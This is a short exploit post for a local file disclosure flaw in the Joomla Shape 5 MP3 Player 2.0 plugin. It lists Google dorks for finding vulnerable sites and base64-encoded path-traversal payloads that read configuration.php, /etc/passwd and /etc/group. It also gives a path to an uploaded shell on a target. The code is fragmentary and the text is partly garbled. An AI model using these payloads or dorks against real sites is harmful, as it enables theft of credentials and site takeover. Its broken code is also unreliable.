Exploit Joomla Shape 5 MP3 Player 2.0 Local File Disclosure upload shell : Exploit Shell Upload Joomla Shape 5 MP3 Player 2.0 Local File Disclosure ================================================================= ************ On-Linux **************** |~RISK : High |~Google Dork : inurl:"php?fileUrl=" |~Google Dork : inurl:plugins/content/s5_media_player ======================Info========================================= helper.php unconsciously encoded. This is a very simple security measures, It was exposed to attack. if base64 encrypting the file names 'fileurl' function is used, and local files will be easily exposed. ============ Error line's in helper.php ============== base64.b64encode("../../../configuration.php") elif command == "2": command = base64.b64encode("../../../../../../../../../etc/passwd") elif command == "3": command = base64.b64encode("../../../../../../../../../etc/group") Evil Path : http://[TARGET.com]/administrator/templates/"file"/"shell name".php